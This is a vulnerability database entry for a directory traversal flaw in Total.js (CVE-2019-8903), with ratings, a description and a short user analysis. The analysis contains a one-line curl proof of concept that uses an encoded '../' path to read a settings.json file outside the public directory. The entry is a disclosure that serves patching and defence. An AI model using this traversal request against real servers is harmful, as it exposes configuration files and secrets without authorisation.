Attacker Value
High
(1 user assessed)
Exploitability
Very High
(1 user assessed)
User Interaction
Unknown
Privileges Required
Unknown
Attack Vector
Unknown
1

Total.js requestcontinue Directory Traversal Vulnerability

Disclosure Date: February 18, 2019 Last updated November 13, 2019
Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Description

Total.js is prone to a directory traversal vulnerability. Attackers can exploit this issue and read files remotely.

Add Assessment

2
Ratings
Technical Analysis

Totaljs – Unathenticated Directory Traversal

DESCRIPTION
User can make requests like “GET /../databases/settings.json
HTTP/1.1” and include file contents from outside the /public
the directory which is the default directory for accessible static files.

Refer:-
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8903

PROOF OF CONCEPT

$ curl -v --path-as-is
http://127.0.0.1:8000/.%2e/databases/settings.json 

#(note that .json is in the extensions list by def.)

General Information

Additional Info

Technical Analysis

This site uses cookies for anonymized analytics. For more information or to change your cookie settings, view our Cookie Policy.